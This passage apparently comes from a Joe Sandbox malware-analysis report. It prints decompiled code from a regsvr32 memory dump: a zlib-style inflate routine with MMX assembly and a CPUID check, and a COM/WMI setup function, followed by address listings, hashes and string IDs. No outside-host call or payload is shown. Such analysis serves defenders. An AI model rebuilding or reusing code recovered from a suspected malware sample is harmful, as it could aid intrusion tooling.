							_t351 =  *((intOrPtr*)(_t176 + 0x1c));
							_t282 = _t253 >> 3;
							_t397 = _t396 - _t282;
							_t254 = _t253 - (_t282 << 3);
							 *(_t176 + 0xc) = _t368;
							 *(_t351 + 0x3c) = _t254;
							_t284 = _t254;
							_t255 =  &(_t435[7]);
							if(_t435[5] == _t255) {
								_t266 =  *_t176;
								_t435[5] = _t266;
								_t397 = _t397 - _t255 + _t266;
								_t435[5] = _t435[5] +  *((intOrPtr*)(_t176 + 4)) - 0xb;
							}
							 *_t176 = _t397;
							_t258 = (1 << _t284) - 1;
							if( *0x49fe040 == 2) {
								asm("psrlq mm0, mm1");
								asm("movd ebp, mm0");
								asm("emms");
							}
							 *(_t351 + 0x38) = _t431 & _t258;
							_t259 = _t435[5];
							if(_t259 <= _t397) {
								 *((intOrPtr*)(_t176 + 4)) =  ~(_t397 - _t259) + 0xb;
							} else {
								 *((intOrPtr*)(_t176 + 4)) = _t259 - _t397 + 0xb;
							}
							_t260 = _t435[4];
							if(_t260 <= _t368) {
								 *((intOrPtr*)(_t176 + 0x10)) =  ~(_t368 - _t260) + 0x101;
							} else {
								 *((intOrPtr*)(_t176 + 0x10)) = _t260 - _t368 + 0x101;
							}
							asm("popfd");
							return _t176;
						}
						_push(_t172);
						_push(_t252);
						_push(_t278);
						_push(_t347);
						asm("pushfd");
						 *_t435 =  *_t435 ^ 0x00200000;
						asm("popfd");
						asm("pushfd");
						_pop(_t364);
						_t365 = _t364 ^  *_t435;
						if(_t365 == 0) {
							L15:
							 *0x49fe040 = 3;
							L16:
							_pop(_t347);
							_pop(_t278);
							_pop(_t252);
							_pop(_t172);
							continue;
						}
						asm("cpuid");
						if(_t252 != 0x756e6547 || _t278 != 0x6c65746e || _t365 != 0x49656e69) {
							goto L15;
						} else {
							asm("cpuid");
							if(0xd != 6 || (_t365 & 0x00800000) == 0) {
								goto L15;
							} else {
								 *0x49fe040 = 2;
								goto L16;
							}
						}
					}
					asm("emms");
					asm("movd mm0, ebp");
					_t431 = _t252;
					asm("movd mm4, dword [esp]");
					asm("movq mm3, mm4");
					asm("movd mm5, dword [esp+0x4]");
					asm("movq mm2, mm5");
					asm("pxor mm1, mm1");
					_t253 = _t435[2];
					do {
						asm("psrlq mm0, mm1");
						if(_t431 <= 0x20) {
							asm("movd mm6, ebp");
							asm("movd mm7, dword [esi]");
							_t396 = _t396 + 4;
							asm("psllq mm7, mm6");
							_t431 = _t431 + 0x20;
							asm("por mm0, mm7");
						}
						asm("pand mm4, mm0");
						asm("movd eax, mm4");
						asm("movq mm4, mm3");
						_t173 =  *(_t253 + _t172 * 4);
						while(1) {
							_t279 = _t173 & 0x000000ff;
							asm("movd mm1, ecx");
							_t431 = _t431 - _t279;
							if(_t173 == 0) {
								break;
							}
							_t349 = _t173 >> 0x10;
							if((_t173 & 0x00000010) == 0) {
								if((_t173 & 0x00000040) != 0) {
									goto L97;
								}
								asm("psrlq mm0, mm1");
								asm("movd ecx, mm0");
								_t173 =  *(_t253 + ((_t279 &  *(0x49f668c + (_t173 & 0x0000000f) * 4)) + _t349) * 4);
								continue;
							}
							_t178 = _t173 & 0x0000000f;
							if(_t178 != 0) {
								asm("psrlq mm0, mm1");
								asm("movd mm1, eax");
								asm("movd ecx, mm0");
								_t431 = _t431 - _t178;
								_t349 = _t349 + (_t279 &  *(0x49f668c + _t178 * 4));
							}
							asm("psrlq mm0, mm1");
							if(_t431 <= 0x20) {
								asm("movd mm6, ebp");
								asm("movd mm7, dword [esi]");
								_t396 = _t396 + 4;
								asm("psllq mm7, mm6");
								_t431 = _t431 + 0x20;
								asm("por mm0, mm7");
							}
							asm("pand mm5, mm0");
							asm("movd eax, mm5");
							asm("movq mm5, mm2");
							_t179 =  *(_t435[3] + _t178 * 4);
							while(1) {
								_t287 = _t179 & 0x000000ff;
								_t253 = _t179 >> 0x10;
								_t431 = _t431 - _t287;
								asm("movd mm1, ecx");
								if((_t179 & 0x00000010) != 0) {
									break;
								}
								if((_t179 & 0x00000040) != 0) {
									goto L96;
								}
								asm("psrlq mm0, mm1");
								asm("movd ecx, mm0");
								_t179 =  *(_t435[3] + ((_t287 &  *(0x49f668c + (_t179 & 0x0000000f) * 4)) + _t253) * 4);
							}
							_t182 = _t179 & 0x0000000f;
							if(_t182 == 0) {
								if(_t253 != 1 || _t435[0xa] == _t368) {
									L76:
									_t435[0xb] = _t396;
									_t184 = _t368 - _t435[0xa];
									if(_t184 < _t253) {
										_t185 = _t435[0xd];
										_t291 =  ~_t184;
										_t403 = _t435[0xe];
										if(_t185 < _t253) {
											goto L100;
										}
										_t292 = _t291 + _t253;
										if(_t435[0xc] != 0) {
											_t186 = _t435[0xc];
											if(_t292 <= _t186) {
												_t405 = _t403 + _t186 - _t292;
												if(_t349 > _t292) {
													_t349 = _t349 - _t292;
													memcpy(_t368, _t405, _t292);
													_t435 =  &(_t435[3]);
													_t368 = _t405 + _t292 + _t292;
													_t405 = _t368 - _t253;
												}
											} else {
												_t405 = _t403 + _t435[0xd] + _t186 - _t292;
												_t296 = _t292 - _t186;
												if(_t349 > _t296) {
													_t349 = _t349 - _t296;
													memcpy(_t368, _t405, _t296);
													_t435 =  &(_t435[3]);
													_t368 = _t405 + _t296 + _t296;
													_t405 = _t435[0xe];
													_t298 = _t435[0xc];
													if(_t349 > _t298) {
														_t349 = _t349 - _t298;
														memcpy(_t368, _t405, _t298);
														_t435 =  &(_t435[3]);
														_t368 = _t405 + _t298 + _t298;
														_t405 = _t368 - _t253;
													}
												}
											}
										} else {
											_t405 = _t403 + _t185 - _t292;
											if(_t349 > _t292) {
												_t349 = _t349 - _t292;
												memcpy(_t368, _t405, _t292);
												_t435 =  &(_t435[3]);
												_t368 = _t405 + _t292 + _t292;
												_t405 = _t368 - _t253;
											}
										}
										_t293 = _t349;
										_t172 = memcpy(_t368, _t405, _t293);
										_t435 =  &(_t435[3]);
										_t368 = _t405 + _t293 + _t293;
										_t396 = _t435[0xb];
										_t253 = _t435[2];
										goto L64;
									}
									_t412 = _t368 - _t253;
									_t302 = _t349 - 3;
									 *_t368 =  *_t412;
									_t413 = _t412 + 3;
									 *((char*)(_t368 + 1)) =  *((intOrPtr*)(_t412 + 1));
									 *((char*)(_t368 + 2)) =  *((intOrPtr*)(_t412 + 2));
									_t172 = memcpy(_t368 + 3, _t413, _t302);
									_t435 =  &(_t435[3]);
									_t368 = _t413 + _t302 + _t302;
									_t396 = _t435[0xb];
									_t253 = _t435[2];
									goto L64;
								} else {
									_t380 = _t368 - 1;
									_t194 =  *_t380;
									_t305 = _t349 - 3;
									 *(_t380 + 1) = _t194;
									 *(_t380 + 2) = _t194;
									 *(_t380 + 3) = _t194;
									_t381 = _t380 + 4;
									_t172 = memset(_t381, _t194, _t305 << 0);
									_t435 =  &(_t435[3]);
									_t368 = _t381 + _t305;
									_t253 = _t435[2];
									L64:
									if(_t435[4] <= _t368) {
										goto L104;
									}
									goto L65;
								}
							}
							asm("psrlq mm0, mm1");
							asm("movd mm1, eax");
							asm("movd ecx, mm0");
							_t431 = _t431 - _t182;
							_t253 = _t253 + (_t287 &  *(0x49f668c + _t182 * 4));
							goto L76;
						}
						_t172 = _t173 >> 0x10;
						asm("stosb");
						goto L64;
						L65:
					} while (_t435[5] > _t396);
					goto L104;
				}
			}




























































































                                                                                                                                                                        0x049f670f
                                                                                                                                                                        0x049f6714
                                                                                                                                                                        0x049f6715
                                                                                                                                                                        0x049f6718
                                                                                                                                                                        0x049f6719
                                                                                                                                                                        0x049f671d
                                                                                                                                                                        0x049f6723
                                                                                                                                                                        0x049f672a
                                                                                                                                                                        0x049f672e
                                                                                                                                                                        0x049f6736
                                                                                                                                                                        0x049f6739
                                                                                                                                                                        0x049f674a
                                                                                                                                                                        0x049f674e
                                                                                                                                                                        0x049f6752
                                                                                                                                                                        0x049f675c
                                                                                                                                                                        0x049f6760
                                                                                                                                                                        0x049f676f
                                                                                                                                                                        0x049f677d
                                                                                                                                                                        0x049f6781
                                                                                                                                                                        0x049f6787
                                                                                                                                                                        0x049f678a
                                                                                                                                                                        0x049f678e
                                                                                                                                                                        0x049f6792
                                                                                                                                                                        0x049f6796
                                                                                                                                                                        0x049f6799
                                                                                                                                                                        0x049f679c
                                                                                                                                                                        0x049f67a0
                                                                                                                                                                        0x049f67a6
                                                                                                                                                                        0x049f67ca
                                                                                                                                                                        0x049f67d0
                                                                                                                                                                        0x049f67d6
                                                                                                                                                                        0x049f67d7
                                                                                                                                                                        0x049f67d9
                                                                                                                                                                        0x049f67dc
                                                                                                                                                                        0x049f67de
                                                                                                                                                                        0x00000000
                                                                                                                                                                        0x049f67de
                                                                                                                                                                        0x00000000
                                                                                                                                                                        0x049f67a8
                                                                                                                                                                        0x049f67ab
                                                                                                                                                                        0x049f67be
                                                                                                                                                                        0x049f67be
                                                                                                                                                                        0x049f67be
                                                                                                                                                                        0x049f67c0
                                                                                                                                                                        0x049f67c4
                                                                                                                                                                        0x049f67e2
                                                                                                                                                                        0x049f67e2
                                                                                                                                                                        0x049f67e6
                                                                                                                                                                        0x049f67e6
                                                                                                                                                                        0x049f67ed
                                                                                                                                                                        0x00000000
                                                                                                                                                                        0x00000000
                                                                                                                                                                        0x049f67f3
                                                                                                                                                                        0x049f6860
                                                                                                                                                                        0x049f6863
                                                                                                                                                                        0x049f6867
                                                                                                                                                                        0x049f6869
                                                                                                                                                                        0x049f686b
                                                                                                                                                                        0x049f6870
                                                                                                                                                                        0x049f6870
                                                                                                                                                                        0x049f687b
                                                                                                                                                                        0x049f687e
                                                                                                                                                                        0x049f6880
                                                                                                                                                                        0x049f6882
                                                                                                                                                                        0x049f6886
                                                                                                                                                                        0x049f688b
                                                                                                                                                                        0x049f688b
                                                                                                                                                                        0x049f688b
                                                                                                                                                                        0x049f68a3
                                                                                                                                                                        0x049f68a6
                                                                                                                                                                        0x049f68aa
                                                                                                                                                                        0x049f69a6
                                                                                                                                                                        0x049f6cba
                                                                                                                                                                        0x049f6cbc
                                                                                                                                                                        0x049f6cca
                                                                                                                                                                        0x049f6ccf
                                                                                                                                                                        0x049f6cbe
                                                                                                                                                                        0x049f6cbe
                                                                                                                                                                        0x049f6cc3
                                                                                                                                                                        0x049f6cc3
                                                                                                                                                                        0x049f6ce6
                                                                                                                                                                        0x049f6ce6
                                                                                                                                                                        0x049f6cec
                                                                                                                                                                        0x049f6cee
                                                                                                                                                                        0x049f6cee
                                                                                                                                                                        0x049f6cf4
                                                                                                                                                                        0x00000000
                                                                                                                                                                        0x049f6cf4
                                                                                                                                                                        0x049f69bc
                                                                                                                                                                        0x00000000
                                                                                                                                                                        0x049f69bc
                                                                                                                                                                        0x049f68b0
                                                                                                                                                                        0x049f68b3
                                                                                                                                                                        0x049f68b7
                                                                                                                                                                        0x049f68bd
                                                                                                                                                                        0x049f68bf
                                                                                                                                                                        0x049f68c1
                                                                                                                                                                        0x049f68c6
                                                                                                                                                                        0x049f68c8
                                                                                                                                                                        0x049f68c8
                                                                                                                                                                        0x049f68d2
                                                                                                                                                                        0x049f68d4
                                                                                                                                                                        0x049f68d6
                                                                                                                                                                        0x049f68d8
                                                                                                                                                                        0x049f68d8
                                                                                                                                                                        0x049f68da
                                                                                                                                                                        0x049f68e1
                                                                                                                                                                        0x049f68e5
                                                                                                                                                                        0x049f68e7
                                                                                                                                                                        0x049f68e9
                                                                                                                                                                        0x049f68ee
                                                                                                                                                                        0x049f68ee
                                                                                                                                                                        0x049f68fa
                                                                                                                                                                        0x049f68fd
                                                                                                                                                                        0x049f68ff
                                                                                                                                                                        0x049f6904
                                                                                                                                                                        0x049f6906
                                                                                                                                                                        0x049f6908
                                                                                                                                                                        0x049f690c
                                                                                                                                                                        0x00000000
                                                                                                                                                                        0x00000000
                                                                                                                                                                        0x049f69c6
                                                                                                                                                                        0x049f6cae
                                                                                                                                                                        0x049f6cae
                                                                                                                                                                        0x049f6cb3
                                                                                                                                                                        0x00000000
                                                                                                                                                                        0x049f6cb3
                                                                                                                                                                        0x049f69dc
                                                                                                                                                                        0x049f69dc
                                                                                                                                                                        0x049f6912
                                                                                                                                                                        0x049f6915
                                                                                                                                                                        0x049f697f
                                                                                                                                                                        0x049f693e
                                                                                                                                                                        0x049f693e
                                                                                                                                                                        0x049f6944
                                                                                                                                                                        0x049f694a
                                                                                                                                                                        0x049f69e6
                                                                                                                                                                        0x049f69ea
                                                                                                                                                                        0x049f69ec
                                                                                                                                                                        0x049f69f2
                                                                                                                                                                        0x049f6cd6
                                                                                                                                                                        0x049f6cd6
                                                                                                                                                                        0x049f6cda
                                                                                                                                                                        0x049f6cdf
                                                                                                                                                                        0x00000000
                                                                                                                                                                        0x049f6cdf
                                                                                                                                                                        0x049f69f8
                                                                                                                                                                        0x049f69ff
                                                                                                                                                                        0x049f6a25
                                                                                                                                                                        0x049f6a2b
                                                                                                                                                                        0x049f6a5b
                                                                                                                                                                        0x049f6a5d
                                                                                                                                                                        0x049f6a63
                                                                                                                                                                        0x049f6a67
                                                                                                                                                                        0x049f6a67
                                                                                                                                                                        0x049f6a67
                                                                                                                                                                        0x049f6a6b
                                                                                                                                                                        0x049f6a6b
                                                                                                                                                                        0x049f6a2d
                                                                                                                                                                        0x049f6a33
                                                                                                                                                                        0x049f6a35
                                                                                                                                                                        0x049f6a37
                                                                                                                                                                        0x049f6a3d
                                                                                                                                                                        0x049f6a41
                                                                                                                                                                        0x049f6a41
                                                                                                                                                                        0x049f6a41
                                                                                                                                                                        0x049f6a43
                                                                                                                                                                        0x049f6a47
                                                                                                                                                                        0x049f6a4d
                                                                                                                                                                        0x049f6a51
                                                                                                                                                                        0x049f6a51
                                                                                                                                                                        0x049f6a51
                                                                                                                                                                        0x049f6a55
                                                                                                                                                                        0x049f6a55
                                                                                                                                                                        0x049f6a4d
                                                                                                                                                                        0x049f6a3d
                                                                                                                                                                        0x049f6a01
                                                                                                                                                                        0x049f6a03
                                                                                                                                                                        0x049f6a05
                                                                                                                                                                        0x049f6a0b
                                                                                                                                                                        0x049f6a0f
                                                                                                                                                                        0x049f6a0f
                                                                                                                                                                        0x049f6a0f
                                                                                                                                                                        0x049f6a13
                                                                                                                                                                        0x049f6a13
                                                                                                                                                                        0x049f6a0b
                                                                                                                                                                        0x049f6a6d
                                                                                                                                                                        0x049f6a6f
                                                                                                                                                                        0x049f6a6f
                                                                                                                                                                        0x049f6a6f
                                                                                                                                                                        0x049f6a71
                                                                                                                                                                        0x00000000
                                                                                                                                                                        0x049f6a71
                                                                                                                                                                        0x049f6956
                                                                                                                                                                        0x049f6958
                                                                                                                                                                        0x049f695d
                                                                                                                                                                        0x049f6965
                                                                                                                                                                        0x049f6968
                                                                                                                                                                        0x049f696b
                                                                                                                                                                        0x049f6971
                                                                                                                                                                        0x049f6971
                                                                                                                                                                        0x049f6971
                                                                                                                                                                        0x049f6973
                                                                                                                                                                        0x049f6987
                                                                                                                                                                        0x049f6987
                                                                                                                                                                        0x049f698c
                                                                                                                                                                        0x049f698e
                                                                                                                                                                        0x049f6991
                                                                                                                                                                        0x049f6994
                                                                                                                                                                        0x049f6997
                                                                                                                                                                        0x049f699a
                                                                                                                                                                        0x049f699d
                                                                                                                                                                        0x049f699d
                                                                                                                                                                        0x049f699d
                                                                                                                                                                        0x049f699d
                                                                                                                                                                        0x00000000
                                                                                                                                                                        0x049f697f
                                                                                                                                                                        0x049f6919
                                                                                                                                                                        0x049f691f
                                                                                                                                                                        0x049f6921
                                                                                                                                                                        0x049f6923
                                                                                                                                                                        0x049f6928
                                                                                                                                                                        0x049f692a
                                                                                                                                                                        0x049f692a
                                                                                                                                                                        0x049f6934
                                                                                                                                                                        0x049f6936
                                                                                                                                                                        0x049f6938
                                                                                                                                                                        0x049f693a
                                                                                                                                                                        0x00000000
                                                                                                                                                                        0x049f693a
                                                                                                                                                                        0x049f688c
                                                                                                                                                                        0x049f688c
                                                                                                                                                                        0x049f6cf8
                                                                                                                                                                        0x049f6cff
                                                                                                                                                                        0x049f6d01
                                                                                                                                                                        0x049f6d01
                                                                                                                                                                        0x049f6d03
                                                                                                                                                                        0x049f6d09
                                                                                                                                                                        0x049f6d0c
                                                                                                                                                                        0x049f6d0f
                                                                                                                                                                        0x049f6d14
                                                                                                                                                                        0x049f6d16
                                                                                                                                                                        0x049f6d19
                                                                                                                                                                        0x049f6d1c
                                                                                                                                                                        0x049f6d1e
                                                                                                                                                                        0x049f6d26
                                                                                                                                                                        0x049f6d2a
                                                                                                                                                                        0x049f6d2c
                                                                                                                                                                        0x049f6d30
                                                                                                                                                                        0x049f6d38
                                                                                                                                                                        0x049f6d38
                                                                                                                                                                        0x049f6d3c
                                                                                                                                                                        0x049f6d45
                                                                                                                                                                        0x049f6d4d
                                                                                                                                                                        0x049f6d4f
                                                                                                                                                                        0x049f6d52
                                                                                                                                                                        0x049f6d55
                                                                                                                                                                        0x049f6d55
                                                                                                                                                                        0x049f6d59
                                                                                                                                                                        0x049f6d5c
                                                                                                                                                                        0x049f6d62
                                                                                                                                                                        0x049f6d75
                                                                                                                                                                        0x049f6d64
                                                                                                                                                                        0x049f6d69
                                                                                                                                                                        0x049f6d69
                                                                                                                                                                        0x049f6d78
                                                                                                                                                                        0x049f6d7e
                                                                                                                                                                        0x049f6d97
                                                                                                                                                                        0x049f6d80
                                                                                                                                                                        0x049f6d88
                                                                                                                                                                        0x049f6d88
                                                                                                                                                                        0x049f6d9d
                                                                                                                                                                        0x049f6da2
                                                                                                                                                                        0x049f6da2
                                                                                                                                                                        0x049f67f5
                                                                                                                                                                        0x049f67f6
                                                                                                                                                                        0x049f67f7
                                                                                                                                                                        0x049f67f8
                                                                                                                                                                        0x049f67f9
                                                                                                                                                                        0x049f67fd
                                                                                                                                                                        0x049f6804
                                                                                                                                                                        0x049f6805
                                                                                                                                                                        0x049f6806
                                                                                                                                                                        0x049f6807
                                                                                                                                                                        0x049f6809
                                                                                                                                                                        0x049f684f
                                                                                                                                                                        0x049f684f
                                                                                                                                                                        0x049f6859
                                                                                                                                                                        0x049f6859
                                                                                                                                                                        0x049f685a
                                                                                                                                                                        0x049f685b
                                                                                                                                                                        0x049f685c
                                                                                                                                                                        0x00000000
                                                                                                                                                                        0x049f685c
                                                                                                                                                                        0x049f680d
                                                                                                                                                                        0x049f6815
                                                                                                                                                                        0x00000000
                                                                                                                                                                        0x049f6827
                                                                                                                                                                        0x049f682c
                                                                                                                                                                        0x049f6837
                                                                                                                                                                        0x00000000
                                                                                                                                                                        0x049f6843
                                                                                                                                                                        0x049f6843
                                                                                                                                                                        0x00000000
                                                                                                                                                                        0x049f6843
                                                                                                                                                                        0x049f6837
                                                                                                                                                                        0x049f6815
                                                                                                                                                                        0x049f6a7c
                                                                                                                                                                        0x049f6a7e
                                                                                                                                                                        0x049f6a81
                                                                                                                                                                        0x049f6a83
                                                                                                                                                                        0x049f6a87
                                                                                                                                                                        0x049f6a8a
                                                                                                                                                                        0x049f6a8f
                                                                                                                                                                        0x049f6a92
                                                                                                                                                                        0x049f6a95
                                                                                                                                                                        0x049f6a9c
                                                                                                                                                                        0x049f6a9c
                                                                                                                                                                        0x049f6aa2
                                                                                                                                                                        0x049f6aa4
                                                                                                                                                                        0x049f6aa7
                                                                                                                                                                        0x049f6aaa
                                                                                                                                                                        0x049f6aad
                                                                                                                                                                        0x049f6ab0
                                                                                                                                                                        0x049f6ab3
                                                                                                                                                                        0x049f6ab3
                                                                                                                                                                        0x049f6ab6
                                                                                                                                                                        0x049f6ab9
                                                                                                                                                                        0x049f6abc
                                                                                                                                                                        0x049f6abf
                                                                                                                                                                        0x049f6ac2
                                                                                                                                                                        0x049f6ac2
                                                                                                                                                                        0x049f6ac5
                                                                                                                                                                        0x049f6ac8
                                                                                                                                                                        0x049f6acc
                                                                                                                                                                        0x00000000
                                                                                                                                                                        0x00000000
                                                                                                                                                                        0x049f6ae9
                                                                                                                                                                        0x049f6aee
                                                                                                                                                                        0x049f6bd6
                                                                                                                                                                        0x00000000
                                                                                                                                                                        0x00000000
                                                                                                                                                                        0x049f6bdf
                                                                                                                                                                        0x049f6be2
                                                                                                                                                                        0x049f6bee
                                                                                                                                                                        0x00000000
                                                                                                                                                                        0x049f6bee
                                                                                                                                                                        0x049f6af4
                                                                                                                                                                        0x049f6af7
                                                                                                                                                                        0x049f6af9
                                                                                                                                                                        0x049f6afc
                                                                                                                                                                        0x049f6aff
                                                                                                                                                                        0x049f6b02
                                                                                                                                                                        0x049f6b0b
                                                                                                                                                                        0x049f6b0b
                                                                                                                                                                        0x049f6b0d
                                                                                                                                                                        0x049f6b13
                                                                                                                                                                        0x049f6b15
                                                                                                                                                                        0x049f6b18
                                                                                                                                                                        0x049f6b1b
                                                                                                                                                                        0x049f6b1e
                                                                                                                                                                        0x049f6b21
                                                                                                                                                                        0x049f6b24
                                                                                                                                                                        0x049f6b24
                                                                                                                                                                        0x049f6b2b
                                                                                                                                                                        0x049f6b2e
                                                                                                                                                                        0x049f6b31
                                                                                                                                                                        0x049f6b34
                                                                                                                                                                        0x049f6b37
                                                                                                                                                                        0x049f6b37
                                                                                                                                                                        0x049f6b3c
                                                                                                                                                                        0x049f6b3f
                                                                                                                                                                        0x049f6b41
                                                                                                                                                                        0x049f6b46
                                                                                                                                                                        0x00000000
                                                                                                                                                                        0x00000000
                                                                                                                                                                        0x049f6bfa
                                                                                                                                                                        0x00000000
                                                                                                                                                                        0x00000000
                                                                                                                                                                        0x049f6c03
                                                                                                                                                                        0x049f6c06
                                                                                                                                                                        0x049f6c16
                                                                                                                                                                        0x049f6c16
                                                                                                                                                                        0x049f6b4c
                                                                                                                                                                        0x049f6b4f
                                                                                                                                                                        0x049f6bab
                                                                                                                                                                        0x049f6b65
                                                                                                                                                                        0x049f6b65
                                                                                                                                                                        0x049f6b6b
                                                                                                                                                                        0x049f6b71
                                                                                                                                                                        0x049f6c22
                                                                                                                                                                        0x049f6c26
                                                                                                                                                                        0x049f6c28
                                                                                                                                                                        0x049f6c2e
                                                                                                                                                                        0x00000000
                                                                                                                                                                        0x00000000
                                                                                                                                                                        0x049f6c34
                                                                                                                                                                        0x049f6c3b
                                                                                                                                                                        0x049f6c5d
                                                                                                                                                                        0x049f6c63
                                                                                                                                                                        0x049f6c8f
                                                                                                                                                                        0x049f6c93
                                                                                                                                                                        0x049f6c95
                                                                                                                                                                        0x049f6c97
                                                                                                                                                                        0x049f6c97
                                                                                                                                                                        0x049f6c97
                                                                                                                                                                        0x049f6c9b
                                                                                                                                                                        0x049f6c9b
                                                                                                                                                                        0x049f6c65
                                                                                                                                                                        0x049f6c6b
                                                                                                                                                                        0x049f6c6d
                                                                                                                                                                        0x049f6c71
                                                                                                                                                                        0x049f6c73
                                                                                                                                                                        0x049f6c75
                                                                                                                                                                        0x049f6c75
                                                                                                                                                                        0x049f6c75
                                                                                                                                                                        0x049f6c77
                                                                                                                                                                        0x049f6c7b
                                                                                                                                                                        0x049f6c81
                                                                                                                                                                        0x049f6c83
                                                                                                                                                                        0x049f6c85
                                                                                                                                                                        0x049f6c85
                                                                                                                                                                        0x049f6c85
                                                                                                                                                                        0x049f6c89
                                                                                                                                                                        0x049f6c89
                                                                                                                                                                        0x049f6c81
                                                                                                                                                                        0x049f6c71
                                                                                                                                                                        0x049f6c3d
                                                                                                                                                                        0x049f6c3f
                                                                                                                                                                        0x049f6c43
                                                                                                                                                                        0x049f6c45
                                                                                                                                                                        0x049f6c47
                                                                                                                                                                        0x049f6c47
                                                                                                                                                                        0x049f6c47
                                                                                                                                                                        0x049f6c4b
                                                                                                                                                                        0x049f6c4b
                                                                                                                                                                        0x049f6c43
                                                                                                                                                                        0x049f6c9d
                                                                                                                                                                        0x049f6c9f
                                                                                                                                                                        0x049f6c9f
                                                                                                                                                                        0x049f6c9f
                                                                                                                                                                        0x049f6ca1
                                                                                                                                                                        0x049f6ca5
                                                                                                                                                                        0x00000000
                                                                                                                                                                        0x049f6ca5
                                                                                                                                                                        0x049f6b7b
                                                                                                                                                                        0x049f6b7d
                                                                                                                                                                        0x049f6b82
                                                                                                                                                                        0x049f6b8a
                                                                                                                                                                        0x049f6b8d
                                                                                                                                                                        0x049f6b90
                                                                                                                                                                        0x049f6b96
                                                                                                                                                                        0x049f6b96
                                                                                                                                                                        0x049f6b96
                                                                                                                                                                        0x049f6b98
                                                                                                                                                                        0x049f6b9c
                                                                                                                                                                        0x00000000
                                                                                                                                                                        0x049f6bb3
                                                                                                                                                                        0x049f6bb3
                                                                                                                                                                        0x049f6bb6
                                                                                                                                                                        0x049f6bb8
                                                                                                                                                                        0x049f6bbb
                                                                                                                                                                        0x049f6bbe
                                                                                                                                                                        0x049f6bc1
                                                                                                                                                                        0x049f6bc4
                                                                                                                                                                        0x049f6bc7
                                                                                                                                                                        0x049f6bc7
                                                                                                                                                                        0x049f6bc7
                                                                                                                                                                        0x049f6bc9
                                                                                                                                                                        0x049f6ad2
                                                                                                                                                                        0x049f6ad6
                                                                                                                                                                        0x00000000
                                                                                                                                                                        0x00000000
                                                                                                                                                                        0x00000000
                                                                                                                                                                        0x049f6ad6
                                                                                                                                                                        0x049f6bab
                                                                                                                                                                        0x049f6b51
                                                                                                                                                                        0x049f6b54
                                                                                                                                                                        0x049f6b57
                                                                                                                                                                        0x049f6b5a
                                                                                                                                                                        0x049f6b63
                                                                                                                                                                        0x00000000
                                                                                                                                                                        0x049f6b63
                                                                                                                                                                        0x049f6ace
                                                                                                                                                                        0x049f6ad1
                                                                                                                                                                        0x00000000
                                                                                                                                                                        0x049f6adc
                                                                                                                                                                        0x049f6adc
                                                                                                                                                                        0x00000000
                                                                                                                                                                        0x049f6ae2

                                                                                                                                                                        Strings
                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                        • Source File: 0000001A.00000002.494976271.00000000049E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 049E0000, based on PE: true
                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                        • Snapshot File: hcaresult_26_2_49e0000_regsvr32.jbxd
                                                                                                                                                                        Yara matches
                                                                                                                                                                        Similarity
                                                                                                                                                                        • API ID:
                                                                                                                                                                        • String ID: Genu$ineI$invalid distance code$invalid distance too far back$invalid literal/length code$ntel
                                                                                                                                                                        • API String ID: 0-3089872807
                                                                                                                                                                        • Opcode ID: 1e5c129fbe39f62aea5fe05668b7033fc3ac5211c685b8261dcf6f14276ba74c
                                                                                                                                                                        • Instruction ID: c80228467d989c736f48d80d88493ddfc90a9904d5b53142a36b77dcd9d056fd
                                                                                                                                                                        • Opcode Fuzzy Hash: 1e5c129fbe39f62aea5fe05668b7033fc3ac5211c685b8261dcf6f14276ba74c
                                                                                                                                                                        • Instruction Fuzzy Hash: FB120632A083518FD714CE38C99022ABBE2FB84354F488A3DEA9597B41E375FD5AD741
                                                                                                                                                                        Uniqueness

                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                        Function 049EE400 Relevance: 7.6, APIs: 5, Instructions: 87commemoryCOMMON
                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                        C-Code - Quality: 30%
                                                                                                                                                                        			E049EE400(void* __ecx) {
				char _v8;
				void* _v12;
				char* _t15;
				intOrPtr* _t16;
				void* _t21;
				intOrPtr* _t23;
				intOrPtr* _t24;
				intOrPtr* _t25;
				void* _t30;
				void* _t33;

				_v12 = 0;
				_v8 = 0;
				__imp__CoInitializeEx(0, 0, _t30, _t33, __ecx, __ecx);
				__imp__CoInitializeSecurity(0, 0xffffffff, 0, 0, 0, 3, 0, 0, 0);
				_t15 =  &_v12;
				__imp__CoCreateInstance(0x49fc868, 0, 1, 0x49fc878, _t15);
				if(_t15 < 0) {
					L5:
					_t23 = _v8;
					if(_t23 != 0) {
						 *((intOrPtr*)( *_t23 + 8))(_t23);
					}
					_t24 = _v12;
					if(_t24 != 0) {
						 *((intOrPtr*)( *_t24 + 8))(_t24);
					}
					_t16 = 0;
				} else {
					__imp__#2(__ecx);
					_t25 = _v12;
					_t21 =  *((intOrPtr*)( *_t25 + 0xc))(_t25, _t15, 0, 0, 0, 0, 0, 0,  &_v8);
					if(_t21 < 0) {
						goto L5;
					} else {
						__imp__CoSetProxyBlanket(_v8, 0xa, 0, 0, 3, 3, 0, 0);
						if(_t21 < 0) {
							goto L5;
						} else {
							_t16 = E049E8BDE(8);
							if(_t16 == 0) {
								goto L5;
							} else {
								 *((intOrPtr*)(_t16 + 4)) = _v12;
								 *_t16 = _v8;
							}
						}
					}
				}
				return _t16;
			}













                                                                                                                                                                        0x049ee40d
                                                                                                                                                                        0x049ee410
                                                                                                                                                                        0x049ee413
                                                                                                                                                                        0x049ee424
                                                                                                                                                                        0x049ee42a
                                                                                                                                                                        0x049ee43b
                                                                                                                                                                        0x049ee443
                                                                                                                                                                        0x049ee494
                                                                                                                                                                        0x049ee494
                                                                                                                                                                        0x049ee499
                                                                                                                                                                        0x049ee49e
                                                                                                                                                                        0x049ee49e
                                                                                                                                                                        0x049ee4a1
                                                                                                                                                                        0x049ee4a6
                                                                                                                                                                        0x049ee4ab
                                                                                                                                                                        0x049ee4ab
                                                                                                                                                                        0x049ee4ae
                                                                                                                                                                        0x049ee445
                                                                                                                                                                        0x049ee446
                                                                                                                                                                        0x049ee44c
                                                                                                                                                                        0x049ee45d
                                                                                                                                                                        0x049ee462
                                                                                                                                                                        0x00000000
                                                                                                                                                                        0x049ee464
                                                                                                                                                                        0x049ee471
                                                                                                                                                                        0x049ee479
                                                                                                                                                                        0x00000000
                                                                                                                                                                        0x049ee47b
                                                                                                                                                                        0x049ee47d
                                                                                                                                                                        0x049ee485
                                                                                                                                                                        0x00000000
                                                                                                                                                                        0x049ee487
                                                                                                                                                                        0x049ee48a
